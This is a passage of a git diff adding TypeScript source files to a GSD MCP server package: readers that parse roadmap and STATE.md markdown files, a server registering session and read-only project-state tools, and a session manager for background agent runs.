}); + } + if (results.length > 0) return results; + + // H3 format: ### T01: Title + const h3Re = /^###\s+(T\d+):\s*(.+)/gm; + while ((match = h3Re.exec(content)) !== null) { + results.push({ + id: match[1], + title: match[2].trim(), + done: false, + }); + } + + return results; +} + +// --------------------------------------------------------------------------- +// Milestone title from CONTEXT.md or ROADMAP.md H1 +// --------------------------------------------------------------------------- + +function readMilestoneTitle(gsdRoot: string, mid: string): string { + const ctxPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT'); + if (ctxPath && existsSync(ctxPath)) { + const content = readFileSync(ctxPath, 'utf-8'); + const h1 = content.match(/^#\s+(?:M\d+:?\s*)?(.+)/m); + if (h1) return h1[1].trim(); + } + + const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP'); + if 
(roadmapPath && existsSync(roadmapPath)) { + const content = readFileSync(roadmapPath, 'utf-8'); + const h1 = content.match(/^#\s+(?:M\d+:?\s*)?(.+)/m); + if (h1) return h1[1].trim(); + } + + return mid; +} + +function readVision(gsdRoot: string, mid: string): string { + const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP'); + if (!roadmapPath || !existsSync(roadmapPath)) return ''; + + const content = readFileSync(roadmapPath, 'utf-8'); + const section = content.match(/## Vision\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + return section ? section[1].trim() : ''; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readRoadmap(projectDir: string, filterMilestoneId?: string): RoadmapResult { + const gsd = resolveGsdRoot(projectDir); + let milestoneIds = findMilestoneIds(gsd); + + if (filterMilestoneId) { + milestoneIds = milestoneIds.filter((id) => id === filterMilestoneId); + } + + const milestones: MilestoneInfo[] = []; + + for (const mid of milestoneIds) { + const title = readMilestoneTitle(gsd, mid); + const vision = readVision(gsd, mid); + + const summaryPath = resolveMilestoneFile(gsd, mid, 'SUMMARY'); + const hasSummary = summaryPath !== null && existsSync(summaryPath); + + const roadmapPath = resolveMilestoneFile(gsd, mid, 'ROADMAP'); + let roadmapSlices: ReturnType = []; + if (roadmapPath && existsSync(roadmapPath)) { + roadmapSlices = parseRoadmapTable(readFileSync(roadmapPath, 'utf-8')); + } + + const fsSliceIds = findSliceIds(gsd, mid); + const sliceIdSet = new Set([ + ...roadmapSlices.map((s) => s.id), + ...fsSliceIds, + ]); + + const slices: SliceInfo[] = []; + for (const sid of Array.from(sliceIdSet).sort()) { + const roadmapEntry = roadmapSlices.find((s) => s.id === sid); + const taskFiles = findTaskFiles(gsd, mid, sid); + + const planPath = resolveSliceFile(gsd, mid, sid, 'PLAN'); + let planTasks: 
ReturnType = []; + if (planPath && existsSync(planPath)) { + planTasks = parseSlicePlanTasks(readFileSync(planPath, 'utf-8')); + } + + const tasks: TaskInfo[] = []; + const seenIds = new Set(); + + for (const pt of planTasks) { + const fsTask = taskFiles.find((t) => t.id === pt.id); + const done = fsTask?.hasSummary ?? pt.done; + tasks.push({ id: pt.id, title: pt.title, status: done ? 'done' : 'pending' }); + seenIds.add(pt.id); + } + for (const ft of taskFiles) { + if (seenIds.has(ft.id)) continue; + tasks.push({ id: ft.id, title: ft.id, status: ft.hasSummary ? 'done' : 'pending' }); + } + + const allDone = tasks.length > 0 && tasks.every((t) => t.status === 'done'); + const anyDone = tasks.some((t) => t.status === 'done'); + const sliceStatus: SliceInfo['status'] = allDone ? 'done' : anyDone ? 'active' : 'pending'; + + slices.push({ + id: sid, + title: roadmapEntry?.title ?? sid, + status: sliceStatus, + risk: roadmapEntry?.risk ?? 'medium', + depends: roadmapEntry?.depends ?? [], + demo: roadmapEntry?.demo ?? '', + tasks, + }); + } + + const allSlicesDone = slices.length > 0 && slices.every((s) => s.status === 'done'); + const anySliceActive = slices.some((s) => s.status === 'active' || s.status === 'done'); + const milestoneStatus: MilestoneInfo['status'] = hasSummary + ? 'done' + : allSlicesDone ? 'done' : anySliceActive ? 
'active' : 'pending'; + + milestones.push({ id: mid, title, status: milestoneStatus, vision, slices }); + } + + return { milestones }; +} diff --git a/packages/mcp-server/src/readers/state.ts b/packages/mcp-server/src/readers/state.ts new file mode 100644 index 000000000..93ea7d38f --- /dev/null +++ b/packages/mcp-server/src/readers/state.ts @@ -0,0 +1,223 @@ +// GSD MCP Server — project state reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { + resolveGsdRoot, + resolveRootFile, + findMilestoneIds, + resolveMilestoneDir, + resolveMilestoneFile, + findSliceIds, + findTaskFiles, +} from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export interface ProgressResult { + activeMilestone: { id: string; title: string } | null; + activeSlice: { id: string; title: string } | null; + activeTask: { id: string; title: string } | null; + phase: string; + milestones: { total: number; done: number; active: number; pending: number; parked: number }; + slices: { total: number; done: number; active: number; pending: number }; + tasks: { total: number; done: number; pending: number }; + requirements: { active: number; validated: number; deferred: number; outOfScope: number } | null; + blockers: string[]; + nextAction: string; +} + +// --------------------------------------------------------------------------- +// STATE.md parser +// --------------------------------------------------------------------------- + +function parseBoldField(content: string, label: string): string | null { + const re = new RegExp(`\\*\\*${label}:\\*\\*\\s*(.+)`, 'i'); + const m = content.match(re); + return m ? 
m[1].trim() : null; +} + +function parseActiveRef(value: string | null): { id: string; title: string } | null { + if (!value || value.toLowerCase() === 'none' || value === '—') return null; + // "M001: Flight Simulator" or "M001" + const m = value.match(/^(M\d+|S\d+|T\d+):?\s*(.*)/); + if (m) return { id: m[1], title: m[2] || m[1] }; + return { id: value, title: value }; +} + +function parsePhase(value: string | null): string { + if (!value) return 'unknown'; + const lower = value.toLowerCase().trim(); + if (lower.includes('research') || lower.includes('discuss')) return 'research'; + if (lower.includes('plan')) return 'plan'; + if (lower.includes('execut')) return 'execute'; + if (lower.includes('complete') || lower.includes('done')) return 'complete'; + return lower; +} + +function parseRequirementsLine(value: string | null): ProgressResult['requirements'] | null { + if (!value) return null; + const active = value.match(/(\d+)\s*active/i); + const validated = value.match(/(\d+)\s*validated/i); + const deferred = value.match(/(\d+)\s*deferred/i); + const outOfScope = value.match(/(\d+)\s*out.of.scope/i); + if (!active && !validated && !deferred && !outOfScope) return null; + return { + active: active ? parseInt(active[1], 10) : 0, + validated: validated ? parseInt(validated[1], 10) : 0, + deferred: deferred ? parseInt(deferred[1], 10) : 0, + outOfScope: outOfScope ? 
parseInt(outOfScope[1], 10) : 0, + }; +} + +function parseBlockers(content: string): string[] { + const section = content.match(/## Blockers\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (!section) return []; + return section[1] + .split('\n') + .map((l) => l.replace(/^[-*]\s*/, '').trim()) + .filter(Boolean); +} + +function parseNextAction(content: string): string { + const section = content.match(/## Next Action\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (!section) return ''; + return section[1].trim().split('\n')[0] || ''; +} + +// --------------------------------------------------------------------------- +// Milestone registry from STATE.md +// --------------------------------------------------------------------------- + +interface RegistryEntry { id: string; status: 'done' | 'active' | 'pending' | 'parked' } + +function parseMilestoneRegistry(content: string): RegistryEntry[] { + const section = content.match(/## Milestone Registry\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (!section) return []; + const entries: RegistryEntry[] = []; + for (const line of section[1].split('\n')) { + const m = line.match(/[-*]\s*(☑|✅|🔄|⬜|⏸)\s*\*\*(M\d+):\*\*/); + if (!m) continue; + const [, icon, id] = m; + let status: RegistryEntry['status'] = 'pending'; + if (icon === '☑' || icon === '✅') status = 'done'; + else if (icon === '🔄') status = 'active'; + else if (icon === '⏸') status = 'parked'; + entries.push({ id, status }); + } + return entries; +} + +// --------------------------------------------------------------------------- +// Count slices/tasks by walking filesystem +// --------------------------------------------------------------------------- + +function countSlicesAndTasks(gsdRoot: string, milestoneIds: string[]): { + slices: ProgressResult['slices']; + tasks: ProgressResult['tasks']; +} { + let sliceTotal = 0, sliceDone = 0, sliceActive = 0; + let taskTotal = 0, taskDone = 0; + + for (const mid of milestoneIds) { + const sliceIds = findSliceIds(gsdRoot, mid); + sliceTotal += 
sliceIds.length; + + for (const sid of sliceIds) { + const tasks = findTaskFiles(gsdRoot, mid, sid); + taskTotal += tasks.length; + + const allDone = tasks.length > 0 && tasks.every((t) => t.hasSummary); + const anyDone = tasks.some((t) => t.hasSummary); + + if (allDone) { + sliceDone++; + taskDone += tasks.length; + } else { + if (anyDone) sliceActive++; + taskDone += tasks.filter((t) => t.hasSummary).length; + } + } + } + + return { + slices: { + total: sliceTotal, + done: sliceDone, + active: sliceActive, + pending: sliceTotal - sliceDone - sliceActive, + }, + tasks: { total: taskTotal, done: taskDone, pending: taskTotal - taskDone }, + }; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readProgress(projectDir: string): ProgressResult { + const gsd = resolveGsdRoot(projectDir); + const statePath = resolveRootFile(gsd, 'STATE.md'); + + // Defaults + const result: ProgressResult = { + activeMilestone: null, + activeSlice: null, + activeTask: null, + phase: 'unknown', + milestones: { total: 0, done: 0, active: 0, pending: 0, parked: 0 }, + slices: { total: 0, done: 0, active: 0, pending: 0 }, + tasks: { total: 0, done: 0, pending: 0 }, + requirements: null, + blockers: [], + nextAction: '', + }; + + if (!existsSync(statePath)) { + // No STATE.md — derive from filesystem only + const milestoneIds = findMilestoneIds(gsd); + result.milestones.total = milestoneIds.length; + result.milestones.pending = milestoneIds.length; + const counts = countSlicesAndTasks(gsd, milestoneIds); + result.slices = counts.slices; + result.tasks = counts.tasks; + return result; + } + + const content = readFileSync(statePath, 'utf-8'); + + // Parse STATE.md fields + result.activeMilestone = parseActiveRef(parseBoldField(content, 'Active Milestone')); + result.activeSlice = parseActiveRef(parseBoldField(content, 'Active Slice')); + 
result.activeTask = parseActiveRef(parseBoldField(content, 'Active Task')); + result.phase = parsePhase(parseBoldField(content, 'Phase')); + result.requirements = parseRequirementsLine(parseBoldField(content, 'Requirements Status')); + result.blockers = parseBlockers(content); + result.nextAction = parseNextAction(content); + + // Milestone counts from registry + const registry = parseMilestoneRegistry(content); + if (registry.length > 0) { + result.milestones.total = registry.length; + result.milestones.done = registry.filter((e) => e.status === 'done').length; + result.milestones.active = registry.filter((e) => e.status === 'active').length; + result.milestones.parked = registry.filter((e) => e.status === 'parked').length; + result.milestones.pending = registry.length - + result.milestones.done - result.milestones.active - result.milestones.parked; + } else { + // Fallback: count directories + const milestoneIds = findMilestoneIds(gsd); + result.milestones.total = milestoneIds.length; + result.milestones.pending = milestoneIds.length; + } + + // Slice/task counts from filesystem + const milestoneIds = findMilestoneIds(gsd); + const counts = countSlicesAndTasks(gsd, milestoneIds); + result.slices = counts.slices; + result.tasks = counts.tasks; + + return result; +} diff --git a/packages/mcp-server/src/server.ts b/packages/mcp-server/src/server.ts new file mode 100644 index 000000000..f684700ed --- /dev/null +++ b/packages/mcp-server/src/server.ts @@ -0,0 +1,409 @@ +/** + * MCP Server — registers GSD orchestration + read-only project state tools. + * + * Session tools (6): gsd_execute, gsd_status, gsd_result, gsd_cancel, gsd_query, gsd_resolve_blocker + * Read-only tools (6): gsd_progress, gsd_roadmap, gsd_history, gsd_doctor, gsd_captures, gsd_knowledge + * + * Uses dynamic imports for @modelcontextprotocol/sdk because TS Node16 + * cannot resolve the SDK's subpath exports statically (same pattern as + * src/mcp-server.ts in the main package). 
+ */ + +import { readFile, readdir, stat } from 'node:fs/promises'; +import { join, resolve } from 'node:path'; +import { z } from 'zod'; +import type { SessionManager } from './session-manager.js'; +import { readProgress } from './readers/state.js'; +import { readRoadmap } from './readers/roadmap.js'; +import { readHistory } from './readers/metrics.js'; +import { readCaptures } from './readers/captures.js'; +import { readKnowledge } from './readers/knowledge.js'; +import { runDoctorLite } from './readers/doctor-lite.js'; + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +const MCP_PKG = '@modelcontextprotocol/sdk'; +const SERVER_NAME = 'gsd'; +const SERVER_VERSION = '2.53.0'; + +// --------------------------------------------------------------------------- +// Tool result helpers +// --------------------------------------------------------------------------- + +/** Wrap a JSON-serializable value as MCP tool content. */ +function jsonContent(data: unknown): { content: Array<{ type: 'text'; text: string }> } { + return { content: [{ type: 'text' as const, text: JSON.stringify(data, null, 2) }] }; +} + +/** Return an MCP error response. 
*/ +function errorContent(message: string): { isError: true; content: Array<{ type: 'text'; text: string }> } { + return { isError: true, content: [{ type: 'text' as const, text: message }] }; +} + +// --------------------------------------------------------------------------- +// gsd_query filesystem reader +// --------------------------------------------------------------------------- + +async function readProjectState(projectDir: string, _query: string): Promise> { + const gsdDir = join(resolve(projectDir), '.gsd'); + const result: Record = { projectDir: resolve(projectDir) }; + + // STATE.md — current execution state + try { + result.state = await readFile(join(gsdDir, 'STATE.md'), 'utf-8'); + } catch { + result.state = null; + } + + // PROJECT.md — project description + try { + result.project = await readFile(join(gsdDir, 'PROJECT.md'), 'utf-8'); + } catch { + result.project = null; + } + + // REQUIREMENTS.md — requirement contract + try { + result.requirements = await readFile(join(gsdDir, 'REQUIREMENTS.md'), 'utf-8'); + } catch { + result.requirements = null; + } + + // List milestones with basic metadata + const milestonesDir = join(gsdDir, 'milestones'); + try { + const entries = await readdir(milestonesDir, { withFileTypes: true }); + const milestones: Array<{ id: string; hasRoadmap: boolean; hasSummary: boolean }> = []; + for (const entry of entries) { + if (!entry.isDirectory()) continue; + const mDir = join(milestonesDir, entry.name); + const hasRoadmap = await fileExists(join(mDir, `${entry.name}-ROADMAP.md`)); + const hasSummary = await fileExists(join(mDir, `${entry.name}-SUMMARY.md`)); + milestones.push({ id: entry.name, hasRoadmap, hasSummary }); + } + result.milestones = milestones; + } catch { + result.milestones = []; + } + + return result; +} + +async function fileExists(path: string): Promise { + try { + await stat(path); + return true; + } catch { + return false; + } +} + +// 
--------------------------------------------------------------------------- +// MCP Server type — minimal interface for the dynamically-imported McpServer +// --------------------------------------------------------------------------- + +interface McpServerInstance { + tool(name: string, description: string, params: Record, handler: (args: Record) => Promise): unknown; + connect(transport: unknown): Promise; + close(): Promise; +} + +// --------------------------------------------------------------------------- +// createMcpServer +// --------------------------------------------------------------------------- + +/** + * Create and configure an MCP server with 12 GSD tools (6 session + 6 read-only). + * + * Returns the McpServer instance — call `connect(transport)` to start serving. + * Uses dynamic imports for the MCP SDK to avoid TS subpath resolution issues. + */ +export async function createMcpServer(sessionManager: SessionManager): Promise<{ + server: McpServerInstance; +}> { + // Dynamic import — same workaround as src/mcp-server.ts + const mcpMod = await import(`${MCP_PKG}/server/mcp.js`); + const McpServer = mcpMod.McpServer; + + const server: McpServerInstance = new McpServer( + { name: SERVER_NAME, version: SERVER_VERSION }, + { capabilities: { tools: {} } }, + ); + + // ----------------------------------------------------------------------- + // gsd_execute — start a new GSD auto-mode session + // ----------------------------------------------------------------------- + server.tool( + 'gsd_execute', + 'Start a GSD auto-mode session for a project directory. 
Returns a sessionId for tracking.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + command: z.string().optional().describe('Command to send (default: "/gsd auto")'), + model: z.string().optional().describe('Model ID override'), + bare: z.boolean().optional().describe('Run in bare mode (skip user config)'), + }, + async (args: Record) => { + const { projectDir, command, model, bare } = args as { + projectDir: string; command?: string; model?: string; bare?: boolean; + }; + try { + const sessionId = await sessionManager.startSession(projectDir, { command, model, bare }); + return jsonContent({ sessionId, status: 'started' }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_status — poll session status + // ----------------------------------------------------------------------- + server.tool( + 'gsd_status', + 'Get the current status of a GSD session including progress, recent events, and pending blockers.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + }, + async (args: Record) => { + const { sessionId } = args as { sessionId: string }; + try { + const session = sessionManager.getSession(sessionId); + if (!session) return errorContent(`Session not found: ${sessionId}`); + + const durationMs = Date.now() - session.startTime; + const toolCallCount = session.events.filter( + (e) => (e as Record).type === 'tool_use' || + (e as Record).type === 'tool_execution_start' + ).length; + + return jsonContent({ + status: session.status, + progress: { + eventCount: session.events.length, + toolCalls: toolCallCount, + }, + recentEvents: session.events.slice(-10), + pendingBlocker: session.pendingBlocker + ? 
{ + id: session.pendingBlocker.id, + method: session.pendingBlocker.method, + message: session.pendingBlocker.message, + } + : null, + cost: session.cost, + durationMs, + }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_result — get accumulated session result + // ----------------------------------------------------------------------- + server.tool( + 'gsd_result', + 'Get the result of a GSD session. Returns partial results if the session is still running.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + }, + async (args: Record) => { + const { sessionId } = args as { sessionId: string }; + try { + const result = sessionManager.getResult(sessionId); + return jsonContent(result); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_cancel — cancel a running session + // ----------------------------------------------------------------------- + server.tool( + 'gsd_cancel', + 'Cancel a running GSD session. Aborts the current operation and stops the process.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + }, + async (args: Record) => { + const { sessionId } = args as { sessionId: string }; + try { + await sessionManager.cancelSession(sessionId); + return jsonContent({ cancelled: true }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_query — read project state from filesystem (no session needed) + // ----------------------------------------------------------------------- + server.tool( + 'gsd_query', + 'Query GSD project state from the filesystem. 
Returns STATE.md, PROJECT.md, requirements, and milestone listing. Does not require an active session.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + query: z.string().describe('What to query (e.g. "status", "milestones", "requirements")'), + }, + async (args: Record) => { + const { projectDir, query } = args as { projectDir: string; query: string }; + try { + const state = await readProjectState(projectDir, query); + return jsonContent(state); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_resolve_blocker — resolve a pending blocker + // ----------------------------------------------------------------------- + server.tool( + 'gsd_resolve_blocker', + 'Resolve a pending blocker in a GSD session by sending a response to the UI request.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + response: z.string().describe('Response to send for the pending blocker'), + }, + async (args: Record) => { + const { sessionId, response } = args as { sessionId: string; response: string }; + try { + await sessionManager.resolveBlocker(sessionId, response); + return jsonContent({ resolved: true }); + } catch (err) { + return errorContent(err instanceof Error ? 
err.message : String(err)); + } + }, + ); + + // ======================================================================= + // READ-ONLY TOOLS — no session required, pure filesystem reads + // ======================================================================= + + // ----------------------------------------------------------------------- + // gsd_progress — structured project progress metrics + // ----------------------------------------------------------------------- + server.tool( + 'gsd_progress', + 'Get structured project progress: active milestone/slice/task, phase, completion counts, blockers, and next action. No session required — reads directly from .gsd/ on disk.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + }, + async (args: Record) => { + const { projectDir } = args as { projectDir: string }; + try { + return jsonContent(readProgress(projectDir)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_roadmap — milestone/slice/task structure with status + // ----------------------------------------------------------------------- + server.tool( + 'gsd_roadmap', + 'Get the full project roadmap structure: milestones with their slices, tasks, status, risk, and dependencies. Optionally filter to a single milestone. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + milestoneId: z.string().optional().describe('Filter to a specific milestone (e.g. "M001")'), + }, + async (args: Record) => { + const { projectDir, milestoneId } = args as { projectDir: string; milestoneId?: string }; + try { + return jsonContent(readRoadmap(projectDir, milestoneId)); + } catch (err) { + return errorContent(err instanceof Error ? 
err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_history — execution history with cost/token metrics + // ----------------------------------------------------------------------- + server.tool( + 'gsd_history', + 'Get execution history with cost, token usage, model, and duration per unit. Returns totals across all units. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + limit: z.number().optional().describe('Max entries to return (most recent first). Default: all.'), + }, + async (args: Record) => { + const { projectDir, limit } = args as { projectDir: string; limit?: number }; + try { + return jsonContent(readHistory(projectDir, limit)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_doctor — lightweight structural health check + // ----------------------------------------------------------------------- + server.tool( + 'gsd_doctor', + 'Run a lightweight structural health check on the .gsd/ directory. Checks for missing files, status inconsistencies, and orphaned state. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + scope: z.string().optional().describe('Limit checks to a specific milestone (e.g. "M001")'), + }, + async (args: Record) => { + const { projectDir, scope } = args as { projectDir: string; scope?: string }; + try { + return jsonContent(runDoctorLite(projectDir, scope)); + } catch (err) { + return errorContent(err instanceof Error ? 
err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_captures — pending captures and ideas + // ----------------------------------------------------------------------- + server.tool( + 'gsd_captures', + 'Get captured ideas and thoughts from CAPTURES.md with triage status. Filter by pending, actionable, or all. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + filter: z.enum(['all', 'pending', 'actionable']).optional().describe('Filter captures (default: "all")'), + }, + async (args: Record) => { + const { projectDir, filter } = args as { projectDir: string; filter?: 'all' | 'pending' | 'actionable' }; + try { + return jsonContent(readCaptures(projectDir, filter ?? 'all')); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_knowledge — project knowledge base + // ----------------------------------------------------------------------- + server.tool( + 'gsd_knowledge', + 'Get the project knowledge base: rules, patterns, and lessons learned accumulated during development. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + }, + async (args: Record) => { + const { projectDir } = args as { projectDir: string }; + try { + return jsonContent(readKnowledge(projectDir)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + return { server }; +} diff --git a/packages/mcp-server/src/session-manager.ts b/packages/mcp-server/src/session-manager.ts new file mode 100644 index 000000000..841941196 --- /dev/null +++ b/packages/mcp-server/src/session-manager.ts @@ -0,0 +1,328 @@ +/** + * SessionManager — manages RpcClient lifecycle for background GSD execution. + * + * One active session per projectDir. 
Tracks events in a ring buffer, + * detects blockers, tracks terminal state, and accumulates cost using + * the cumulative-max pattern (K004). + */ + +import { execSync } from 'node:child_process'; +import { resolve } from 'node:path'; +import { RpcClient } from '@gsd-build/rpc-client'; +import type { SdkAgentEvent, RpcInitResult, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import type { + ManagedSession, + ExecuteOptions, + PendingBlocker, + CostAccumulator, + SessionStatus, +} from './types.js'; +import { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; + +// --------------------------------------------------------------------------- +// Inlined detection logic (from headless-events.ts — no internal package imports) +// --------------------------------------------------------------------------- + +const FIRE_AND_FORGET_METHODS = new Set([ + 'notify', 'setStatus', 'setWidget', 'setTitle', 'set_editor_text', +]); + +const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped']; + +function isTerminalNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? '').toLowerCase(); + return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix)); +} + +function isBlockedNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? '').toLowerCase(); + return message.includes('blocked:'); +} + +function isBlockingUIRequest(event: Record): boolean { + if (event.type !== 'extension_ui_request') return false; + const method = String(event.method ?? 
''); + return !FIRE_AND_FORGET_METHODS.has(method); +} + +// --------------------------------------------------------------------------- +// SessionManager +// --------------------------------------------------------------------------- + +export class SessionManager { + /** Sessions keyed by projectDir for duplicate-start prevention */ + private sessions = new Map(); + + /** + * Start a new GSD auto-mode session for the given project directory. + * + * Rejects if a session already exists for this projectDir. + * Creates an RpcClient, starts the process, performs the v2 init handshake, + * wires event tracking, and sends '/gsd auto' to begin execution. + */ + async startSession(projectDir: string, options: ExecuteOptions = {}): Promise { + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + + const existing = this.sessions.get(resolvedDir); + if (existing) { + throw new Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const cliPath = options.cliPath ?? 
SessionManager.resolveCLIPath(); + + const args: string[] = ['--mode', 'rpc']; + if (options.model) args.push('--model', options.model); + if (options.bare) args.push('--bare'); + + const client = new RpcClient({ + cliPath, + cwd: resolvedDir, + args, + }); + + // Build the session shell before async operations so we can track state + const session: ManagedSession = { + sessionId: '', // filled after init + projectDir: resolvedDir, + status: 'starting', + client, + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into map early (keyed by dir) so concurrent starts are rejected + this.sessions.set(resolvedDir, session); + + try { + // Start the process with timeout + await Promise.race([ + client.start(), + timeout(INIT_TIMEOUT_MS, `RpcClient.start() timed out after ${INIT_TIMEOUT_MS}ms`), + ]); + + // Perform v2 init handshake + const initResult: RpcInitResult = await Promise.race([ + client.init(), + timeout(INIT_TIMEOUT_MS, `RpcClient.init() timed out after ${INIT_TIMEOUT_MS}ms`), + ]) as RpcInitResult; + + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking + session.unsubscribe = client.onEvent((event: SdkAgentEvent) => { + this.handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? err.message : String(err); + + // Attempt cleanup + try { await client.stop(); } catch { /* swallow cleanup errors */ } + + // Keep session in map so callers can inspect the error + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } + + /** + * Look up a session by sessionId. + * Linear scan is fine — we expect <10 concurrent sessions. 
+ */ + getSession(sessionId: string): ManagedSession | undefined { + for (const session of this.sessions.values()) { + if (session.sessionId === sessionId) return session; + } + return undefined; + } + + /** + * Look up a session by project directory (direct map lookup). + */ + getSessionByDir(projectDir: string): ManagedSession | undefined { + return this.sessions.get(resolve(projectDir)); + } + + /** + * Resolve a pending blocker by sending a UI response. + */ + async resolveBlocker(sessionId: string, response: string): Promise { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + if (!session.pendingBlocker) throw new Error(`No pending blocker for session ${sessionId}`); + + const blocker = session.pendingBlocker; + session.client.sendUIResponse(blocker.id, { value: response }); + session.pendingBlocker = null; + if (session.status === 'blocked') { + session.status = 'running'; + } + } + + /** + * Cancel a running session — abort current operation then stop the process. + */ + async cancelSession(sessionId: string): Promise { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + + try { + await session.client.abort(); + } catch { /* may already be stopped */ } + + try { + await session.client.stop(); + } catch { /* swallow */ } + + session.status = 'cancelled'; + session.unsubscribe?.(); + } + + /** + * Build a HeadlessJsonResult-shaped object from accumulated session state. + */ + getResult(sessionId: string): Record { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + + const durationMs = Date.now() - session.startTime; + + return { + sessionId: session.sessionId, + projectDir: session.projectDir, + status: session.status, + durationMs, + cost: session.cost, + recentEvents: session.events.slice(-10), + pendingBlocker: session.pendingBlocker + ? 
{ id: session.pendingBlocker.id, method: session.pendingBlocker.method, message: session.pendingBlocker.message } + : null, + error: session.error ?? null, + }; + } + + /** + * Stop all active sessions and clean up resources. + */ + async cleanup(): Promise { + const stopPromises: Promise[] = []; + + for (const session of this.sessions.values()) { + session.unsubscribe?.(); + if (session.status === 'running' || session.status === 'starting' || session.status === 'blocked') { + stopPromises.push( + session.client.stop().catch(() => { /* swallow */ }) + ); + session.status = 'cancelled'; + } + } + + await Promise.allSettled(stopPromises); + } + + /** + * Resolve the GSD CLI path. + * + * 1. GSD_CLI_PATH env var (highest priority) + * 2. `which gsd` → resolve to the actual dist/cli.js + */ + static resolveCLIPath(): string { + // Check env var first + const envPath = process.env['GSD_CLI_PATH']; + if (envPath) return resolve(envPath); + + // Fallback: locate `gsd` via which + try { + const gsdBin = execSync('which gsd', { encoding: 'utf-8' }).trim(); + if (gsdBin) { + // gsd bin is typically a symlink to dist/loader.js — return the resolved path + return resolve(gsdBin); + } + } catch { + // which failed + } + + throw new Error( + 'Cannot find GSD CLI. Set GSD_CLI_PATH environment variable or ensure `gsd` is in PATH.' 
+ ); + } + + // --------------------------------------------------------------------------- + // Private: Event Handling + // --------------------------------------------------------------------------- + + private handleEvent(session: ManagedSession, event: SdkAgentEvent): void { + // Ring buffer: push and trim + session.events.push(event); + if (session.events.length > MAX_EVENTS) { + session.events.splice(0, session.events.length - MAX_EVENTS); + } + + // Cost tracking (K004 — cumulative-max) + if (event.type === 'cost_update') { + const costEvent = event as unknown as RpcCostUpdateEvent; + session.cost.totalCost = Math.max(session.cost.totalCost, costEvent.cumulativeCost ?? 0); + if (costEvent.tokens) { + session.cost.tokens.input = Math.max(session.cost.tokens.input, costEvent.tokens.input ?? 0); + session.cost.tokens.output = Math.max(session.cost.tokens.output, costEvent.tokens.output ?? 0); + session.cost.tokens.cacheRead = Math.max(session.cost.tokens.cacheRead, costEvent.tokens.cacheRead ?? 0); + session.cost.tokens.cacheWrite = Math.max(session.cost.tokens.cacheWrite, costEvent.tokens.cacheWrite ?? 
